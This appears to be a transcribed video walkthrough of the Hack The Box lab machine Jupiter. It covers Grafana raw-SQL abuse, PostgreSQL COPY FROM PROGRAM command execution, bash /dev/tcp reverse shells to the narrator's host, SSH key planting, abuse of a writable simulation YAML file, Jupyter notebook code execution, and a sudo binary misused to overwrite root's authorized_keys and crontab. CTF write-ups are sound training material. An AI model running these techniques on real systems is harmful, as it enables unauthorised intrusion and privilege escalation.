HackTheBox - Jupiter

Key Takeaways

what's going on YouTube this is ipag I'm doing Jupiter from hack the box which starts off with some virtual host enumeration to discover the kiosk subdomain and once you go there you discover it is running grafana and grafana is hooked up to postgress so if you inspect the hgp request you can see it's just sending raw SQL queries over to grafana some late enumeration also shows it's running as the grafana admin user which allows you to execute commands from a SQL query unlike like my SQL or sqlite which don't have easy ways to execute commands with a shell on the box you have to do a few different privilege escalations in order to get to rout the first one involves exploiting some Network simulation software you just discover some yaml files put Shell Code in there or not Shell Code but shell commands in there and get access to the Juno user which then lets you read some information in order to access a jupyter notebook and then from there you get a shell as Jovian and there's a binary that you have to do some light exploitation with so with that being said let's jump in as as always we start with an end map so- SC for default scripts SV enumerate versions OA output all formats put the end map directory and call it Jupiter and then the IP address of 10101 11216 this can take some time to run so I've already ran it looking at the results we have just two ports open the first one being SSH on Port 22 and its Banner tells us it's an obuntu server we also have HTTP on Port 80 running engine X and the banner also tells us it's Ubuntu and then we also have the HTTP title script telling us that it redirects to jupiter. htb so let's go ahead and add this to our host file because if we don't then um we'll just get an error message saying we can't find the website so let's go and add 10 10 11216 jupiter. htb and we have to open up Firefox if you don't know what I did there I just pressed alt F2 and we can go to 10 10 11 to6 and we see jupiter. htb and we see planetary observational data so it looks like it's some sciency space type website the first thing I notice is all the links point tohtml so we don't know what type of web server this is looking through it I don't see that much data um if we look at like this image we just see it's image NASA 1 we can try killing this directory to see if open directory listings are in which may let let us see extra images but I'm not seeing any way for us to send input to this website we do have a contact form so let's try this out root atps. uh website hello and then I'm going to turn burp Suite on make sure I am intercepting we can send the message it's getting mapped from Google this is another Maps API call lot of Google Maps I probably should only intercept what the target is but we don't actually get anything um and the contact form just has a question mark so I don't think it actually did anything so at this point we can either attempt to do a durust and try to guess files or maybe get subdomains I'm going to start out with just subdomains because so far I c. HTML I guess we could guess like SL admin to see if we get into a login form because we don't even know like a login how can we guess a password um don't really have anything so let's do go Buster then we can say DH because it's been a while since I did this uh vhost and then let's see we need dasu so we can say HTTP jupiter. htb and then the word list OPC list Discovery DNS s subdomains top million 5,000. text so if we run this it may give us something so we're at 10% and I guess while that goes we could try like a few directories like SL admin um like SL login but since everything was HTML um I don't know how we do a login form because HTML is like for a static site right we can look at the page source for this to see exactly how it's built maybe it's like using Hugo or some static site Builder um I don't see anything right off the bat of how it's built going back here we do find a subdomain of kiosk so let's go and add that to a host file so VY host don't forget to pseudo and then we can add ki. jupiter. HTP HTP and we see it is grafana and typically you see grafana on internal networks not external um it's a lot of um like statistics observational type information like I normally see grafana when it's mapping like creating graphs of CPU usage Ram all those things um but it has a lot of uses one of the silly things about graffo when it's pointed towards like a database is it can run raw SQL because what you're using grafana for is never meant to be sensitive so let us examine these and I'm waiting for a post request to come so API dashboard Prometheus here we go we want the API DS query because this does something really silly and we have raw SQL here and I think this was actually reported as a bug on postgress let me just show this real quick if we run it we can see the um command and then like the output of it right this is a bit of a complicated command so if I just do select um please subscribe and then send this request we see this is our query and then the value is please subscribe so we do have um just maybe it's SQL injection I don't know exactly what to call this because it's a feature it's just letting us run SQL we're not really injecting SQL because we have the full command here right uh we could do like a select version and we get the output we can see it's using postgress SQL and this DS I believe stands for data source um let me see if I can Google this one thing I wanted to do real quick um what was it grafana raw I think it's raw under _ SQL let's go over to Google yeah this Paris is about it saying like it's raw SQL injection if you want to expose it to um yeah they're talking about here but if you want to expose it to like unauthenticated users there is some dashboard now um you can create public Dash a public dashboards that prevent using the raw SQL but old versions of grafana really silly um fun fact when this box first got submitted to hack the Box we had um rejected it because we didn't know this and we said it was unrealistic to do it but um it was actually a feature of grafana so yeah but now that we know we are postgress um what we need to do is probably get away to exu commands because as I said graphon typically just has metrics it's nothing really sensitive in it there's no login there's no credentials what can we really xfill from this database not much however since it is postgress postgress does something really silly um postgress has this copy command so if we do uh copy postgress and look at the man page it will say you can copy the table name from a file or program and this program lets you run random commands so this table name is where you copy the um output of either of these the file or the program so essentially we're just going to use that uh the first thing we have to do though is validate that we are a um postgress administrative user so I'm going to Google Hack Trix postgress because I don't remember all these commands off the top of my head it's always nice to refer back to um hack tricks or payload all the things or something like that so let let's see the first one we want to do it's like something about setting I know so I'm going to contrl f setting there we go it's select current setting is super user so let's run this command paste this in and we get on if we were not it would be off so instead of saying yes no true false postgress says on and off for whatever reason that's how they chose it so now that we know we are super user we can now execute commands and that is down here let's see I already know it's the copy command I may want to just contrl f for that uh let's see copy see here it is so they're going to use the table CMD exact I'm going to change some of these parameters just to show you it doesn't matter so at first they're just going to drop the table if it exists so we can do this and what I'm going to do is call this table um run me so we dropped the table now we want to create it so we know the table doesn't exist so I can create the table I'm going to call this run me and instead of CMD output we're going to do um I'll call it standard out just to show that piece doesn't matter this is text this is like what type of column this is so text obviously matters here because we're going to put text into this column so we have now created the table run me and now we want to run that copy command so we're going to do copy and this is going to be the table name run me from program and we'll leave it as ID to see what that is okay and to make things easier on me I'm going to press controlr to open a new window so I can just do select start from run me go down here and we can see the output now we could change this say like host name and if we don't delete what we did previously it's just going to add another row so we see the First Command was here which was ID and then we have Jupiter so if you're doing this on a operation and you want to make sure you um clean up after yourself because all the commands you have pretty much are logged because that's how it works so let's go back here and we're going to send a reverse shell so I already am using both quotes a single quote and a double quote so because I'm doing that I'm going to try playing with the pipe character because that will let me get away from using other quotes have to worry about escaping characters so I'm going to do Echo then we can do b-i Dev TCP 101048 9,1 0 and 1 like that and then let's base 64 for encode this so I have a plus there I think if I put a space here that gets rid of that plus and then at the end we have a plus here oh two pluses at the end to get rid of that one so all I'm doing now is making this completely alpha numeric I don't think I have to but whenever I can avoid special characters like equals or plus I like doing it so we also have to listen on 90001 and let's see from program we can say Echo this Bas 64 decode it then pipe it over to bash run it this hangs which is a good sign because it's waiting for this to finish which we have our shell so now let's do python 3-c import PTY pt. spawn bin bash Okay contrl C uh contrl Z then stty raw minus Echo for ground it and now we have a shell so I can clear my screen so if I do export term is equal to X term there we go and what do we want to look at on this machine we already kind of determin the data and postgress probably isn't that special we could go enumerate it but I'm not going to do that if you wanted to poke in the database um I would recommend going to ic. ro typing like postgress and maybe like the mentor video will be or developer we have plenty of videos on a numerating postgress or you can just follow it from hack tricks right so let's see uh something killed my python I think this is an error message python p.p I guess there's something killing python so at this point I could use script to get a proper PTY or we can just convert to SSH I'm going to opt for converting to SSH so let's get this real quick export term is equal to X term so I can see this better so one of the other features of post is often it sh is sent to bin bash so since we're the postgress user in our shell is Bash we can just drop s key so let's do m. SSH go into SSH and then we can say ssh-key gen file I'm going to call this um ipac so now we have a key cp. Pub grab this V authorized Keys paste chod 600 and now s-i put my key which is IPC I'll say postgress at jupiter. HTP and that lets us in so if something killed our python shell again it doesn't matter because now we have SSH so we go into home we can see we can't get into any user directory so at this point I may look for like some type of Kernel exploit or also um I'd run Lin pees but before I do that uh always check pseudo rules so pseudo- L we need a password we don't know it and then I also like checking what is listening like what ports are open so Port 80 this is going to be the website 22 SSH 53s DNS so that's going to be a resolve D or whatever it is DNS mask probably um but not important so we have 38888 and postgress so let's curl Local Host Port 3000 see what this is uh that is grafana and I can just tell because I see grafana app so I'm going to ignore that what was that other Port C Local Host um 8888 get nothing add a-v it forwards us to slash tree question mark that forwards us to some type of login so let's do SSH tunnel so I'm going to hit enter but when I do the next thing I type is going to be that squiggly C and that's going to drop me into an SSH prompt which just lets me do a tunnel without closing my SSH session so we'll forward Port 8888 to 1271 888 okay and now if I do Local Host 8888 we get to Jupiter notebook so we need either the password or the token and if we have the token we can just create a new password so at this point I want to try to find the Jupiter token and I don't know it so let's do a f sl- name jup YT R and pipe errors to Dev n see if there's anything it finds uh some python libraries we got Etsy Jupiter Ben Jupiter see we got Jupiter server terminal. Json maybe nope nothing there we go in SL up we have this solar flares thing we can't access it um the user Jovian and members of the science group can so if I do a cat Etsy group and then GP for science we can see two users jien and Jun so let's just search for all the files owned by the user Juno and then if this doesn't pop up anything I'll look for Jian and we have a bunch in Dev shm we have shadow. dat so if I go into this we have network simulation. if I look at it it looks like yl um we have processes path and it's executing curl and if I do it lsla we know Juno owns this so I think most people probably found this through running peace buy to look at running processes on the box and eventually see network simulator running but this is how I found it I just was looking at directories looking at earners and kind of going into the more forensic aspect um but PE byy definitely works but you don't really learn that much by just running Peace by saying oh I saw this binary run and let's look at it right I like finding it this way better but I'd yes that's a long rant for something that doesn't really matter so let's go and look at this if I look at shadow. dat it is October 18th at around midnight if I look at the time now it is that time that exact minute so this is telling me the shadow. data is being updated every minute if I look into shadow. dat uh I see this thing a directory called host which is really interesting because we have this host yaml um variable there so if I go in that we have clients so if I go to like client one uh we have curl um error standard out just bunch of curl files so if I cut that we can see it's doing a curl so if we look at this file again in Dev shm this network simulation it is writable by everyone so what I want to do is see if we can um copy a file into to Juno's directory since he's the owner so CP let's grab our SSH key and then V Network simulation and the path of this um let's see which CP user bin CP I don't know if we need absolute pads or not but since it's used once mine as well so Dev shm authorized keys and that'll go to home Juno SSH authorized Keys save it do LS let's do a date uh 10 12369 and what time is that file I do a stat I should be able to see the seconds so it runs at the top of the minute so we should see it in about 30 seconds so I'm just going to speed up the video uh we'll come back when the Sleep command finishes okay the Sleep command has finished if I do lsla again we still see 36 on shadow. data um let's see maybe it runs every 2 minutes 36 is an even number uh so I'm going to do asleep 45 and we'll come back when this command is finished okay it is done lsla and we see 38 so now let us try to SSH so let's do sh- I the same key we used Juno at 10101 I forget the thing IP jupiter. HTP that's easier and it's asking for a password so something failed let's go in Shadow data host client one so we have client one CP standard out nothing there if we look at standard error cannot open uh the key permission denied so let's go up three directories CP or yeah chod 777 authorized keys so now everyone can read it and now that's rude it copied the network simulation back to how it was so let's do Dev shm authorize keys and then home Juno SSH and I think we can probably run multiple processes so after that I'm going to run user bin CH mod or CH own I should say and we can say Juno on that file and that's not the file I want home Juno author ized keys there we go and let's make it permission 600 CH mod 600 home Juno sh authorized Keys file was changed since writing okay did we already drop the key though we did so if you didn't notice when I was um doing this I saved the file right after the CP and then started doing these commands so it doesn't look like you need the CH own chod command um if we do ls. SSH we can see the permissions are oddly good but um either way we are now Juno on this box so our goal was to find um this token right and that was in SL opt solar flares or at least um we have solar flares there and if I look in probably logs we have a lot of Jupiter logs I'm going to go and grab the latest one and it looks like we have a token so if I copy this we put the token in we can log in to Jupiter notebooks and this is like a documentation thing that lets you have inline code I'm going to go straight to um their example and it's not going to work because it's trying to download things so let's just do a new notebook real quick but the whole point of it is you can write code and then have um these code blocks where you just run it and it gives you the output I've seen it used a lot like when I was doing threat hunting like we had Jupiter notebooks of various scripts and we talked about like what a ioc was and then this would run a query that went to elastic or Splunk and got the results right it just makes documentation really fun like that so let's do a print hello world and I click run and we see it comes back with hello world so we can do let's see import OS then os. system and let's see you can run who am I Jovian so let's copy Dev shm authorize keys to home Jovian SSH right run it uh the home or Jian sh is in a directory so let's make that directory first and then we can copy the key in it and we should be able to SSH to that directory now so let's do sh- I ipac Jovian at 10 10 11 I think it's 216 why do I keep defaulting to the IP address instead of the host name but now we're a jovian um I do want to say I had trouble with this um I think if we did HTTP 1271 888 is this going to work still let's see token was on this page put it in let's do a new notebook it's loading print hello world run okay it is um I'm not sure what error I ran into when I was doing this box before but um it was kind of hung here and I had uh closed my browser reopened it using actually a socks proxy instead of this um local port for it and then it worked but I think I had just screwed up my browser cookies or something and it couldn't authenticate so um ignore that but if you do have troubles uh clear your browser cache because that c piece can be a little finicky so now that we are Jovian on this box uh we can do the same thing uh F sl- user Jovian pipe errors to Dev null see what's special about this guy uh we can ignore anything insists run the home directory has quite a bit but this is all python stuff probably for um Jupiter we got the proc and what's after proc let's see let's just do g-v uh home proc sis run and we can get rid of opt as well and there's nothing if we do A-L we can see we can run this binary this user local bin s a track so let's try running this so I'll do pseudo the binary and we see configuration file has not been found so let's do um f sl- name like this to devn and we see the binary is at user local bin but there is a directory probably here at user local share if I go in user local share it's got config Json Earth PNG map. Json so we have to figure out how to get um s ATT track to load a configuration file let's see if I do user local share SRA config.js not found do we have like estrace we do so it's looking for temp config.js we could have like copied the binary open up and gadra locally but Dynamic analysis is always faster so we probably should just copy the config to Temp so let's do CP user local share sat track to Temp then we can run it looks like we didn't need pseudo and let's see the tle rout does not exist creating it and then it's doing a g on that domain so let's see let's look at what the config looks like so edit temp config.js we see tle root so it created this directory and then we have a tle file weather. text and tle sources I'm not exactly sure what tle means let's see let's just put this to herbox so I'm going to do 10 10 14 8 8,000 um test save this makeer dubdub dub Echo please subscribe to test and now let's start up a web server and we can run sat track again we see it download a test and if we go in that temp was was it tle directory we have test there there's also weather. text which is empty so whatever it downloads it does save so with that logic and since we can run a pseudo we should be able to edit this tle root to be let's see root SSH and we can just [Music] download um I called my key IPC so we want to rename the key to authorize Keys like that and we can CP or key authorize keys and then pseudo sat track make this it did a get to download it so let's do SSH d i um oh yikes I just made a mistake um my authorized key is a private key so CP ip. Pub to authorize keys and let's run this again and hopefully it will overwrite because we could have just clobbered that authorized key file so specify the key root jupiter. htb and we rout let's go in. SSH um V authorized keys so it looks like um it replaces the file it doesn't um yeah it just replaces it so that's good uh if it didn't replace the file then we would have seen the private key here as well and if this SSH didn't exist um I bet we could do it through ver cron tab since we are rout I haven't actually tested this so let's try it out um verse KRON KRON tabs we'll do cron tabs rout let's try this so if I copy this big. Json paste this we could also just do Etsy Chon tab right but I don't want to choose Etsy Chon tab because Etsy cron tab definitely has things in it and we just said um it's going to wipe the file and put it in instead of appending it so if we had just went with Etsy KRON tab right off the bat and they had a bunch of crons here that ran as root um it would screw things up there's less likely of a chance I think of um the verse bull cron tab being used we could potentially let's see cat Etsy pass WD we could probably take like the bin user and do something fun with that but um let's just do root so let's go dub dubdub V root 1 2 3 4 5 and we can say bash d [Music] c b-i Dev TCP 101 14 8 9,1 Z and one like that and specify root here and we take root off this because it just wants a directory for this okay Moment of Truth python 3-c or mhtp server downloaded it we run date um we should have a shell in let's see we'll do 30 seconds and I'll resume the video when this finishes and you'll be with me the moment we get the shell hopefully I didn't want to just cat the um cron tab file because maybe that would reload the cron tab I just wanted to leave it as uh vanilla as possible okay the sleep is done in probably five four 3 2 one and we don't get a shell not sure the KRON actually reloaded when we copy that file let's go verse bull Kon cron tabs there is one for root and that is running if we cat Juno one two 3 four five so I'm guessing the KRON didn't actually reload so this KRON tab never ran that way um let's see ver log is there a cron no there's probably messages is it CIS log grap D ion so it didn't run because the CH mod is screwed up so that is why we couldn't just drop it in that so if I go verse pool um cronon tabs we can see root is not 600 so it failed to update Kon um that sucks let's see I wonder if Etsy KRON tab does that have that same behavior because Etsy cron tab has those permissions one two three so to put it here we'll just need to specify the username after this so if I was on this and I had a shell in the box and I wanted to run this I would probably copy Etsy cron tab to sltm to back it up and then we would go in edit root we can say root like this move root to be on Tab host the server edit the config and we just want to put the directory in Etsy and now we can specify cron tab Pudo so now we have loaded the Cron so if I go over log and we do that same grap command let's see that's insecure mode so it ran this once no mail transfer agent installed so it doesn't try to mail it um it doesn't say reloading cron but we also don't have an error so hopefully in 10 seconds or 8 seconds now we get a shell and we should definitely listen on a port okay I did not miss it so there we go so Etsy Chron tab works but verse bu cron tab does not um and I didn't know that behavior difference before doing this video um so now you know too if you found that interesting definitely let me know in the comments hope you guys enjoyed the video take care and I'll see you all next time